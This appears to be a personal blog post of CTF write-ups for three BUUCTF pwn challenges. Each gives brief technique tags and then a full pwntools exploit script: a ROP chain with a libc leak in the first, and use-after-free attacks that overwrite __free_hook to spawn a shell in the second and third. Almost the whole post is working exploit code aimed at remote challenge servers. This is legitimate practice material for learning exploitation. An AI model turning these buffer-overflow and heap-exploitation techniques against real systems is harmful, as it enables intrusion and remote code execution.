Alex's blog~ Home文章标签分类
buuctf-pwn系列2

rootersctf_2019_babypwn

  • 考点:栈溢出,ropgadget,leak libc,ubuntu18字节对齐
from pwn import *

local = 0

binary = "./rootersctf_2019_babypwn"
libc_path = 'libc-2.27.so'
port = 29701

if local == 1:
    p = process(binary)
else:
    p = remote('node3.buuoj.cn', port)

def dbg():
    context.log_level = 'debug'

context.terminal = ['tmux', 'splitw', '-h']
elf = ELF(binary)

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
read_got = elf.got['read']
pop_rdi_ret = 0x0000000000401223
libc = ELF(libc_path)

p.recvuntil("What do you want me to echo back> ")
payload = 0x100 * b'a' + p64(0) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(0x401146)
p.send(payload)

libc_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b'\x00')) - libc.sym['puts']
log.success("LIBC BASE:{}".format(hex(libc_addr)))

p.recvuntil("> ")
bss_base = 0x404040
read_plt = elf.plt['read']
system = libc_addr + libc.sym['system']

sh = libc_addr + libc.search(b"/bin/sh").__next__()
ret = 0x000000000040101a
payload = 0x108 * b'a' + p64(ret) + p64(pop_rdi_ret) + p64(sh) + p64(system)
p.sendline(payload)

p.interactive()

xm_2019_awd_pwn2

  • 考点:uaf

简单的uaf

from pwn import *

local = 0

binary = './xm_2019_awd_pwn2'
libc_path = '../libc-2.27.so'
port = 27761

if local == 1:
    p = process(binary)
else:
    p = remote('node3.buuoj.cn', port)

context.terminal = ['tmux', 'splitw', '-h']


def dbg():
    context.log_level = 'debug'


def add(size, name):
    p.sendlineafter('>>', '1')
    p.sendlineafter('size:', str(size))
    p.sendafter('content:', name)


def show(index):
    p.sendlineafter('>>', '3')
    p.sendlineafter('idx:', str(index))


def free(index):
    p.sendlineafter('>>', '2')
    p.sendlineafter('idx:', str(index))


def echo(s, addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m' % (s, addr))


# dbg()

for i in range(8):
    add(0x80, 'a\n')

add(0x10, 'b\n')    # 8

for i in range(8):
    free(i)

show(7)

libc = ELF(libc_path)
libc_addr = u64(p.recvuntil(
    b"\x7f")[-6:].ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
echo("libc", libc_addr)
__free_hook = libc_addr + libc.sym["__free_hook"]

free(8)
free(8)
free(8)

add(0x10, p64(__free_hook) + b'\n')
add(0x10, '/bin/sh\x00\n')    # 8
add(0x10, p64(libc_addr + libc.sym['system']) + b'\n')

# gdb.attach(p)
p.interactive()

gyctf_2020_document

  • 考点:
    • uaf
    • unsorted bin
from pwn import *
import sys

arch =  64
challenge = "./gyctf_2020_document"
# libc_path = '/glibc/2.23/64/lib/libc-2.23.so'
libc_path = '../libc-2.23.so'

def dbg():
    context.log_level = 'debug'

def echo(content):
    print("\033[4;36;40mOutput prompts:\033[0m" + "\t\033[7;33;40m[*]\033[0m " + "\033[1;31;40m" + content + "\033[0m")

def exp():
    add("aaaaaaaa", "W", b"a" * 0x70)
    add("/bin/sh\x00", "W", b"/bin/sh\x00" * (0x70 // 0x8))
    free(0)
    show(0)
    libc_base = uu64(ru("\x7f")[-6:]) - 88 - 0x10 - libc.sym["__malloc_hook"]
    echo("libc base:    " + hex(libc_base))
    add("aaaaaaaa", "W", b"a" * 0x70)   # 2
    add("aaaaaaaa", "W", b"a" * 0x70)   # 3
    __free_hook = libc_base + libc.sym["__free_hook"]
    payload = p64(0) + p64(0x21) + p64(__free_hook - 0x10) + p64(1) + p64(0) + p64(0x51)
    payload = payload.ljust(0x70, b'a')
    edit(0, "Y", payload)
    edit(3, "N", p64(libc_base + libc.sym["system"]).ljust(0x70, b'\x00'))
    # gdba()
    # pass

local = int(sys.argv[1])
elf = ELF(challenge)
libc = ELF(libc_path)

context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']

if local:
    io = process(challenge,env = {"LD_PRELOAD":libc_path})
else:
    io = remote("node4.buuoj.cn", 25965)

if arch == 64:
    context.arch = 'amd64'
elif arch == 32:
    context.arch = 'i386'

p   = lambda      : pause() 
s   = lambda x    : success(x)
re  = lambda m, t : io.recv(numb=m, timeout=t)
ru  = lambda x    : io.recvuntil(x)
rl  = lambda      : io.recvline()
sd  = lambda x    : io.send(x)
sl  = lambda x    : io.sendline(x)
ia  = lambda      : io.interactive()
sla = lambda a, b : io.sendlineafter(a, b)
sa  = lambda a, b : io.sendafter(a, b)
uu32 = lambda x   : u32(x.ljust(4,b'\x00'))
uu64 = lambda x   : u64(x.ljust(8,b'\x00'))

_add,_free,_edit,_show = 1,4,3,2

def add(name, sex, content):
    sla("Give me your choice :", str(_add))
    sa("input name", name)
    sa("input sex", sex)
    sa("input information", content)

def edit(idx, flag, content):
    sla("Give me your choice :", str(_edit))
    sla("Give me your index :", str(idx))
    sla("Are you sure change sex?", flag)
    sa("Now change information", content)

def free(idx):
    sla("Give me your choice :", str(_free))
    sla("Give me your index :", str(idx))

def show(idx):
    sla("Give me your choice :", str(_show))
    sla("Give me your index :", str(idx))

bps = []
pie = 1

def gdba():
    if local == 0:
        return 0
    cmd ='set follow-fork-mode parent\n'
    if pie:
        base = int(os.popen("pmap {}|awk '{{print $1}}'".format(io.pid)).readlines()[1],16)
        cmd +=''.join(['b *{:#x}\n'.format(b+base) for b in bps])
        cmd +='set $base={:#x}\n'.format(base)
    else:
        cmd+=''.join(['b *{:#x}\n'.format(b) for b in bps])
    gdb.attach(io,cmd)

exp()
ia()
文章作者: Alex
文章链接: http://example.com/2021/05/11/pwn2/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Alex's blog~
pwnbuuctf